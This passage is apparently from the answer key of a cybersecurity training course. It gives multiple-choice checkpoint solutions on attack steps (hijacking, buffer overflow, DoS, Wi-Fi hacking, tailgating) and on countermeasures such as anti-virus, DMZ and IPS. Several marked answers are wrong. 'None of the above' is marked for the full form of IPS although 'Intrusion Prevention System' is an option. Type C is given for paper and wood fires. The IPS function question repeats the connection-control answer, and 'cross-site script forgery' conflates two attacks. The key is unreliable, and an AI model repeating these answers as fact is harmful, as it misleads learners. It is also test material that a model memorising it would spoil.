   – Desynchronizing the Connection, Tracking the Connection, Injecting the Attacker’s Packet
   – Injecting the Attacker’s Packet, Tracking the Connection, Injecting the Attacker’s Packet
   – Tracking the Connection, Desynchronizing the Connection, Injecting the Attacker’s Packet

5. How many steps are involved in blue-jacking?


– 5
– 4
– The answer is 7
– 10

6. Which of the following options shows the steps of buffer overflow in the correct order?
   – Entrance, Running Commands, Smashing the Stack
   – Smashing the Stack, Entrance, Running Commands
   – The answer is Entrance, Smashing the Stack, Running Commands
   – Running Commands, Smashing the Stack, Entrance

Solutions for Figure 2-72, "Checkpoint (3 of 4)," on page 2-81

Checkpoint solutions (3 of 4)

7. How many steps are involved in DOS attack?


– 3
– 6
– 5
– The answer is 4

8. How many steps are involved in Wi-Fi hacking?


– 4
– The answer is 5
– 6
– 3


Solutions for Figure 2-73, "Checkpoint (4 of 4)," on page 2-82

Checkpoint solutions (4 of 4)

9. Which of the following is not a step of cross-site script forgery?


– This sends malicious script back to the user’s Web browser
– The script host executes the malicious code
– This sends the sensitive data to the hacker’s computer
– The answer is None of the above

10. What is tailgating?


– When a malicious party sends a fraudulent email disguised as a legitimate email
– When one party lies to another to gain access to privileged data
– The answer is When an unauthorized party follows an authorized party into an otherwise
secure location, usually to steal valuable property or confidential information
– All of the above

Unit 3, "Countermeasures"

Solutions for Figure 3-66, "Checkpoint (1 of 4)," on page 3-79

Checkpoint solutions (1 of 4)

1. What is the role of a countermeasure?


– To analyse the threats
– To store data in case of a threat
– To assess the vulnerability in a system
– The answer is To minimize and mitigate the risks and thus the amount of data breaches are
minimized substantially

2. Which of the following is a countermeasure against malware?


– DMZ
– The answer is Anti-virus
– Biometric
– All of the above


Solutions for Figure 3-67, "Checkpoint (2 of 4)," on page 3-80

Checkpoint solutions (2 of 4)

3. What is the function of connection control?
   – The answer is It prevents server resource overload by limiting connection rates, query rates, and other variables for each database user
   – It prevents attackers from exploiting known software vulnerabilities to create DOS. Buffer overflow, for example, is a common platform vulnerability that may be exploited to crash database servers
   – It provides query access control to detect any unauthorized queries that may lead to DOS. DOS attacks targeting platform vulnerabilities, for example, would be likely to trigger both IPS and Dynamic Profile violations
   – It overloads server resources, leading to delayed database responses

4. What is the function of IPS and Protocol Validation?
   – The answer is It prevents server resource overload by limiting connection rates, query rates, and other variables for each database user
   – It prevents attackers from exploiting known software vulnerabilities to create DOS. Buffer overflow, for example, is a common platform vulnerability that may be exploited to crash database servers
   – It provides query access control to detect any unauthorized queries that may lead to DOS. DOS attacks targeting platform vulnerabilities, for example, would be likely to trigger both IPS and Dynamic Profile violations
   – It overloads server resources, leading to delayed database responses

Solutions for Figure 3-68, "Checkpoint (3 of 4)," on page 3-81

Checkpoint solutions (3 of 4)

5. What is the function of Dynamic Profiling?
   – It prevents server resource overload by limiting connection rates, query rates, and other variables for each database user
   – It prevents attackers from exploiting known software vulnerabilities to create DOS. Buffer overflow, for example, is a common platform vulnerability that may be exploited to crash database servers
   – The answer is It provides query access control to detect any unauthorized queries that may lead to DOS. DOS attacks targeting platform vulnerabilities, for example, would be likely to trigger both IPS and Dynamic Profile violations
   – It overloads server resources, leading to delayed database responses

6. Which of the following is a countermeasure for cross-site script forgery?
   – Check and validate all form fields, hidden fields, headers, cookies, query strings, and parameters against a rigorous specification
   – Implement a stringent security policy
   – The answer is Filter the script output to defeat XSS vulnerabilities and prevent them from being transmitted to users
   – All of the above


Solutions for Figure 3-69, "Checkpoint (4 of 4)," on page 3-82

Checkpoint solutions (4 of 4)

7. What is the full form of DMZ?


– Decentralized Mantrap Zone
– Demilitarized Metric Zone
– Demilitarized Zoom
– The answer is Demilitarized Zone

8. What is the full form of IPS?


– Intrusion Protection System
– Intruder Prevention System
– Intrusion Prevention System
– The answer is None of the above

9. Which type of fire extinguisher is used against paper and wood fire?
– Type A
– Type B
– The answer is Type C
– Type E
